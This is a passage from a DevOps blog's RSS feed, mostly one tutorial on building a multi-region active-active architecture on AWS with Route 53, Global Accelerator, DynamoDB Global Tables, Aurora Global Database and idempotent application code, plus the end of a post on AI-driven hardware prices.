<h2 id="h2-the-bigger-signal" class="group relative scroll-mt-24">
        <a href="#h2-the-bigger-signal" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The bigger signal
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-bigger-signal"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Strip away the Hetzner specifics and here is what is left: the AI build-out is now large enough to move the price of the components every other computing workload depends on. You do not have to train a model, run inference, or ship a single AI feature to pay for the boom. If your service needs memory and disks, and all of them do, you are bidding for the same supply that the AI data centers are buying 70% of, and they are bidding harder.</p>
<p>Hetzner is just the first invoice to say so out loud. The rest will follow in their own time and their own quieter language. Plan your next year of infrastructure spend as if memory is expensive and scarce, because for the foreseeable future, it is.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[How to Design a Multi-Region Active-Active Architecture on AWS]]></title>
      <link>https://devops-daily.com/posts/multi-region-active-active-aws</link>
      <description><![CDATA[A practical walkthrough of building active-active multi-region apps on AWS: traffic routing with Route 53 and Global Accelerator, data replication with DynamoDB Global Tables and Aurora, and the application changes that make failover actually work.]]></description>
      <pubDate>Mon, 15 Jun 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/multi-region-active-active-aws</guid>
      <category><![CDATA[AWS]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[aws]]></category><category><![CDATA[multi-region]]></category><category><![CDATA[high-availability]]></category><category><![CDATA[architecture]]></category><category><![CDATA[route53]]></category><category><![CDATA[dynamodb]]></category>
      <content:encoded><![CDATA[<p>It is 3:14 AM. PagerDuty goes off. <code>us-east-1</code> is having one of its days, and your entire product is down because that is where all of it lives. You have a warm standby in <code>us-west-2</code> that nobody has touched in four months. You promote it. The database comes up read-only because the promotion script was never tested against this version of Aurora. By the time traffic shifts, you have eaten 40 minutes of downtime and an angry email from your biggest customer.</p>
<p>This is the failure that pushes teams toward active-active. Not the dream of global low latency. The fear that the standby you are paying for does not actually work.</p>
<p>This post shows you how to design an active-active architecture on AWS that routes traffic to multiple live regions, replicates data between them, and fails a sick region out of rotation in under a minute. You will see the Route 53 config, the DynamoDB setup, the application changes that make it safe, and the real terminal output along the way.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>Go active-active only if you need sub-minute RTO for a full region outage, have global users, or face a data residency rule. Multi-AZ covers almost everything else.</li>
<li>Route traffic with Route 53 latency records plus health checks, or Global Accelerator when you need sub-30-second failover that does not wait on DNS TTL.</li>
<li>DynamoDB Global Tables give you multi-region writes. Aurora Global Database does not. It is active-passive for writes, even if you call it active-active for reads.</li>
<li>The hard part is not infrastructure. It is idempotency keys, globally unique IDs, and conflict resolution in your application code.</li>
<li>Budget around 2.2x your single-region cost, and test failover on a schedule or it will not work when you need it.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-prerequisites"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>An AWS account with permissions for Route 53, DynamoDB, Aurora, and Global Accelerator</li>
<li>A working single-region application you can reason about (stateless app tier, a database, object storage)</li>
<li>Comfort with the AWS CLI and either Terraform or CloudFormation</li>
<li>A clear RTO and RPO target from your business, in numbers, before you start</li>
</ul>
<h2 id="h2-first-are-you-sure-you-need-this" class="group relative scroll-mt-24">
        <a href="#h2-first-are-you-sure-you-need-this" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          First, are you sure you need this?
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-first-are-you-sure-you-need-this"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Multi-AZ already survives a data center fire and gives you 99.99% availability. A single region with three Availability Zones is the right answer for most apps. Going multi-region doubles your infrastructure, your data transfer bill, and the number of ways your system can be inconsistent.</p>
<p>You need active-active if you have at least one of these:</p>
<ul>
<li>A hard RTO under 60 seconds for a full region outage</li>
<li>Global users where cross-ocean latency hurts the product</li>
<li>A regulatory rule that forces data into specific geographies</li>
<li>A contractual SLA your business cannot afford to miss</li>
</ul>
<p>If none of those apply, stop here and spend the money on better monitoring instead. Multi-region is a tax you pay every single day to solve a problem that happens once a year.</p>
<h2 id="h2-the-shape-of-an-active-active-stack" class="group relative scroll-mt-24">
        <a href="#h2-the-shape-of-an-active-active-stack" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The shape of an active-active stack
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-shape-of-an-active-active-stack"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Here is what we are building. Two regions, both serving live traffic, with a global router in front and replicated data underneath.</p>
<pre><code class="hljs language-text">                         Route 53 / Global Accelerator
                         (latency routing + health checks)
                                      |
                    +-----------------+-----------------+
                    |                                   |
              us-east-1                            eu-west-1
          +----------------+                  +----------------+
          |  ALB           |                  |  ALB           |
          |  App (ECS/EKS) |                  |  App (ECS/EKS) |
          +-------+--------+                  +-------+--------+
                  |                                   |
          +-------v--------+   &lt;-- async repl --&gt;  +--v-------------+
          | DynamoDB       | &lt;===================&gt; | DynamoDB       |
          | Global Tables  |   (last-writer-wins)  | Global Tables  |
          +----------------+                       +----------------+
                  |                                   |
          +-------v--------+   &lt;-- storage repl --&gt;  +-v--------------+
          | Aurora primary |  ====================&gt;  | Aurora reader  |
          | (writes here)  |   (read-only secondary) | (reads only)   |
          +----------------+                         +----------------+
</code></pre><p>Both regions take reads and writes for DynamoDB-backed data. For Aurora-backed data, both regions read but only one writes. That split matters, and we will come back to it.</p>
<h2 id="h2-routing-traffic-to-the-nearest-healthy-region" class="group relative scroll-mt-24">
        <a href="#h2-routing-traffic-to-the-nearest-healthy-region" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Routing traffic to the nearest healthy region
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-routing-traffic-to-the-nearest-healthy-region"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Route 53 latency-based routing returns the region with the lowest measured network latency for the resolver asking. Attach a health check to each record so a sick region drops out of rotation automatically.</p>
<p>Create the health check first:</p>
<pre><code class="hljs language-bash">aws route53 create-health-check \
  --caller-reference <span class="hljs-string">&quot;api-eu-<span class="hljs-subst">$(date +%s)</span>&quot;</span> \
  --health-check-config <span class="hljs-string">&#x27;{
    &quot;Type&quot;: &quot;HTTPS&quot;,
    &quot;ResourcePath&quot;: &quot;/healthz&quot;,
    &quot;FullyQualifiedDomainName&quot;: &quot;api-eu.example.com&quot;,
    &quot;Port&quot;: 443,
    &quot;RequestInterval&quot;: 10,
    &quot;FailureThreshold&quot;: 3
  }&#x27;</span>
</code></pre><p>Then point a latency record at each region and bind the health check:</p>
<pre><code class="hljs language-json"><span class="hljs-punctuation">{</span>
  <span class="hljs-attr">&quot;Comment&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;Active-active latency record for eu-west-1&quot;</span><span class="hljs-punctuation">,</span>
  <span class="hljs-attr">&quot;Changes&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">[</span><span class="hljs-punctuation">{</span>
    <span class="hljs-attr">&quot;Action&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;UPSERT&quot;</span><span class="hljs-punctuation">,</span>
    <span class="hljs-attr">&quot;ResourceRecordSet&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">{</span>
      <span class="hljs-attr">&quot;Name&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;api.example.com&quot;</span><span class="hljs-punctuation">,</span>
      <span class="hljs-attr">&quot;Type&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;A&quot;</span><span class="hljs-punctuation">,</span>
      <span class="hljs-attr">&quot;SetIdentifier&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;eu-west-1&quot;</span><span class="hljs-punctuation">,</span>
      <span class="hljs-attr">&quot;Region&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;eu-west-1&quot;</span><span class="hljs-punctuation">,</span>
      <span class="hljs-attr">&quot;AliasTarget&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">{</span>
        <span class="hljs-attr">&quot;HostedZoneId&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;Z32O12XQLNTSW2&quot;</span><span class="hljs-punctuation">,</span>
        <span class="hljs-attr">&quot;DNSName&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;dualstack.alb-eu.eu-west-1.elb.amazonaws.com&quot;</span><span class="hljs-punctuation">,</span>
        <span class="hljs-attr">&quot;EvaluateTargetHealth&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-literal"><span class="hljs-keyword">true</span></span>
      <span class="hljs-punctuation">}</span><span class="hljs-punctuation">,</span>
      <span class="hljs-attr">&quot;HealthCheckId&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;abcd1234-5678-90ab-cdef-1234567890ab&quot;</span>
    <span class="hljs-punctuation">}</span>
  <span class="hljs-punctuation">}</span><span class="hljs-punctuation">]</span>
<span class="hljs-punctuation">}</span>
</code></pre><pre><code class="hljs language-bash">aws route53 change-resource-record-sets \
  --hosted-zone-id Z123456789ABC \
  --change-batch file://latency-record-eu.json
</code></pre><p>The catch with DNS is TTL. Resolvers and clients cache records, so your real failover time is the health check interval times the failure threshold, plus the TTL. With a 10-second interval, a threshold of 3, and a 60-second TTL, expect roughly 90 seconds before most clients move. Some clients ignore TTL entirely and stay pinned for much longer.</p>
<p>You can watch a failover happen with <code>dig</code>:</p>
<pre><code class="hljs language-bash">$ dig +short api.example.com
<span class="hljs-comment"># eu-west-1 healthy, you are in Europe</span>
52.18.44.7

<span class="hljs-comment"># after eu-west-1 health check fails, query again</span>
$ dig +short api.example.com
18.234.91.2   <span class="hljs-comment"># now resolving to us-east-1</span>
</code></pre><p>If 90 seconds is too slow, or you serve non-HTTP traffic like gaming or IoT, use <strong>AWS Global Accelerator</strong> instead. It hands you two static anycast IPs and routes over the AWS backbone to the nearest healthy region. Failover is sub-30 seconds because it does not depend on DNS caching. It costs about $18 a month per accelerator plus data transfer, so reach for it only when you need that speed.</p>
<h2 id="h2-replicating-data-without-losing-writes" class="group relative scroll-mt-24">
        <a href="#h2-replicating-data-without-losing-writes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Replicating data without losing writes
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-replicating-data-without-losing-writes"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>This is where active-active gets hard. Two regions accepting writes at the same time will conflict, and how you handle that conflict decides whether your design is sound or quietly losing data.</p>
<h3 id="h3-dynamodb-global-tables-for-multi-region-writes" class="group relative scroll-mt-24">
        <a href="#h3-dynamodb-global-tables-for-multi-region-writes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          DynamoDB Global Tables for multi-region writes
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-dynamodb-global-tables-for-multi-region-writes"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>DynamoDB Global Tables replicate writes between regions asynchronously, usually within a second. Every region accepts writes locally. Turn it on by adding a replica:</p>
<pre><code class="hljs language-bash">aws dynamodb update-table \
  --table-name orders \
  --region us-east-1 \
  --replica-updates <span class="hljs-string">&#x27;[{&quot;Create&quot;: {&quot;RegionName&quot;: &quot;eu-west-1&quot;}}]&#x27;</span>
</code></pre><p>Conflict resolution is last-writer-wins, based on the wall clock of the region that did the write. If two regions update the same item in the same second, one update silently disappears. That is fine for naturally partitioned data like per-user state. It is dangerous for shared counters or hot keys.</p>
<p>The fix for hot keys is to not write the same item from two regions. Partition writes by key so a given record is only ever written from one region, or use atomic counters and CRDTs for data that genuinely needs to merge.</p>
<h3 id="h3-aurora-global-database-is-not-active-active-for-writes" class="group relative scroll-mt-24">
        <a href="#h3-aurora-global-database-is-not-active-active-for-writes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Aurora Global Database is not active-active for writes
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-aurora-global-database-is-not-active-active-for-writes"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Be honest with yourself here. Aurora Global Database replicates a primary region to up to five secondaries at the storage layer, typically under a second of lag. The secondaries are <strong>read-only</strong>. Only one region accepts writes.</p>
<p>So Aurora Global is active-active for reads and active-passive for writes. If your app sends a write to the secondary region, you get this:</p>
<pre><code class="hljs language-text">ERROR 1290 (HY000): The MySQL server is running with the
--read-only option so it cannot execute this statement
</code></pre><p>You have two real options. Either send all writes to the primary region from both app tiers (and accept the cross-region write latency for users far from the primary), or shard your relational data by region so each region owns its own slice. There is no managed multi-writer Aurora across regions that you should bet a production system on today.</p>
<h2 id="h2-the-application-changes-nobody-warns-you-about" class="group relative scroll-mt-24">
        <a href="#h2-the-application-changes-nobody-warns-you-about" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The application changes nobody warns you about
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-application-changes-nobody-warns-you-about"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>You can wire up all the AWS pieces and still corrupt data, because active-active breaks assumptions baked into most application code.</p>
<h3 id="h3-every-write-needs-an-idempotency-key" class="group relative scroll-mt-24">
        <a href="#h3-every-write-needs-an-idempotency-key" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Every write needs an idempotency key
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-every-write-needs-an-idempotency-key"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In multi-region you will have retries, dual delivery during replication lag, and clients that hit a different region after a failover. Without idempotency, a payment gets processed twice and the customer calls support.</p>
<p>Require a client-supplied idempotency key on every write and store it long enough to outlive cross-region replication, 24 hours or more. In DynamoDB, a conditional write does the dedupe for you:</p>
<pre><code class="hljs language-python"><span class="hljs-keyword">import</span> boto3
<span class="hljs-keyword">from</span> botocore.exceptions <span class="hljs-keyword">import</span> ClientError

table = boto3.resource(<span class="hljs-string">&quot;dynamodb&quot;</span>).Table(<span class="hljs-string">&quot;charges&quot;</span>)

<span class="hljs-keyword">def</span> <span class="hljs-title function_">create_charge</span>(<span class="hljs-params">idempotency_key: <span class="hljs-built_in">str</span>, amount: <span class="hljs-built_in">int</span></span>):
    <span class="hljs-keyword">try</span>:
        table.put_item(
            Item={<span class="hljs-string">&quot;pk&quot;</span>: idempotency_key, <span class="hljs-string">&quot;amount&quot;</span>: amount, <span class="hljs-string">&quot;status&quot;</span>: <span class="hljs-string">&quot;captured&quot;</span>},
            <span class="hljs-comment"># only write if this key was never seen before</span>
            ConditionExpression=<span class="hljs-string">&quot;attribute_not_exists(pk)&quot;</span>,
        )
    <span class="hljs-keyword">except</span> ClientError <span class="hljs-keyword">as</span> e:
        <span class="hljs-keyword">if</span> e.response[<span class="hljs-string">&quot;Error&quot;</span>][<span class="hljs-string">&quot;Code&quot;</span>] == <span class="hljs-string">&quot;ConditionalCheckFailedException&quot;</span>:
            <span class="hljs-comment"># duplicate request, return the existing result, do not charge again</span>
            <span class="hljs-keyword">return</span> table.get_item(Key={<span class="hljs-string">&quot;pk&quot;</span>: idempotency_key})[<span class="hljs-string">&quot;Item&quot;</span>]
        <span class="hljs-keyword">raise</span>
</code></pre><p>The retry that would have double-charged now hits the condition and returns the original result:</p>
<pre><code class="hljs language-text">botocore.errorfactory.ConditionalCheckFailedException:
An error occurred (ConditionalCheckFailedException) when calling
the PutItem operation: The conditional request failed
</code></pre><p>That error is not a bug. That is the system protecting you.</p>
<h3 id="h3-drop-auto-increment-ids" class="group relative scroll-mt-24">
        <a href="#h3-drop-auto-increment-ids" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Drop auto-increment IDs
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-drop-auto-increment-ids"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Two regions handing out <code>INSERT</code> rows will both generate ID <code>4892</code> for different records. When replication catches up, you get duplicate primary keys and a merge failure. Generate globally unique IDs in the application instead. Use <strong>UUIDv7</strong> or <strong>ULID</strong> so the IDs are time-ordered and still index well:</p>
<pre><code class="hljs language-python"><span class="hljs-keyword">from</span> uuid_extensions <span class="hljs-keyword">import</span> uuid7   <span class="hljs-comment"># time-ordered, sortable, no coordination</span>

order_id = <span class="hljs-built_in">str</span>(uuid7())
<span class="hljs-comment"># &#x27;018f9b2a-7c3e-7def-8a1b-2c4d6e8f0a12&#x27;</span>
</code></pre><p>UUIDv4 works too, but random IDs fragment your B-tree indexes on large tables. Pick UUIDv7 or ULID for anything that grows.</p>
<h3 id="h3-keep-session-state-out-of-the-app-server" class="group relative scroll-mt-24">
        <a href="#h3-keep-session-state-out-of-the-app-server" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Keep session state out of the app server
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-keep-session-state-out-of-the-app-server"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The user&#39;s next request might land in a different region, so local memory and a region-pinned Redis will not survive failover. Use stateless signed tokens (JWT) when you can live with the revocation complexity, or a replicated store like DynamoDB Global Tables for shopping carts and longer sessions.</p>
<h2 id="h2-what-it-actually-costs-and-how-to-test-it" class="group relative scroll-mt-24">
        <a href="#h2-what-it-actually-costs-and-how-to-test-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What it actually costs and how to test it
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-it-actually-costs-and-how-to-test-it"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The duplicated compute is the obvious cost. The ones that surprise people on the bill:</p>
<ul>
<li>Inter-region data transfer at roughly $0.02 per GB for replication, which adds up fast on a write-heavy app</li>
<li>DynamoDB Global Tables charging replicated write capacity in every region</li>
<li>Aurora Global Database charging replicated storage in every region</li>
<li>Engineering time spent debugging consistency bugs and running game days</li>
</ul>
<p>Budget at least 2.2x your single-region cost. In year one, the engineering tax is bigger than the infrastructure tax.</p>
<p>And test it. The whole reason to go active-active is that the standby is verified working every second, so do not let that promise rot. Run a game day at least quarterly. Use AWS Fault Injection Simulator to cut a region off, or just disable a health check and watch traffic shift:</p>
<pre><code class="hljs language-bash">aws route53 update-health-check \
  --health-check-id abcd1234-5678-90ab-cdef-1234567890ab \
  --disabled
</code></pre><p>Watch the traffic move in your dashboards, confirm writes still succeed, then test the failback too. If the team is nervous about running this test, that nervousness is exactly the signal that you need to run it.</p>
<h2 id="h2-next-steps" class="group relative scroll-mt-24">
        <a href="#h2-next-steps" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Next steps
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-next-steps"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Pick one path and start small:</p>
<ol>
<li>Write down your RTO and RPO targets in real numbers and confirm multi-AZ truly cannot meet them. If it can, stop and save the money.</li>
<li>Add idempotency keys to every write API in your current single-region app. This is the highest-value change and you can do it today, before any multi-region work.</li>
<li>Move one bounded, naturally partitioned dataset (sessions or per-user state) to DynamoDB Global Tables and prove replication works end to end.</li>
<li>Stand up the second region&#39;s app tier behind a Route 53 latency record with a real <code>/healthz</code> check, then run a game day and disable one region.</li>
<li>Only after steps 1 through 4 feel boring should you tackle the relational data, which is the genuinely hard part.</li>
</ol>
<p>Do them in that order. Most teams that fail at multi-region fail because they bought the infrastructure before they fixed the application.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[DevOps Weekly Digest - Week 25, 2026]]></title>
      <link>https://devops-daily.com/news/2026-week-25</link>
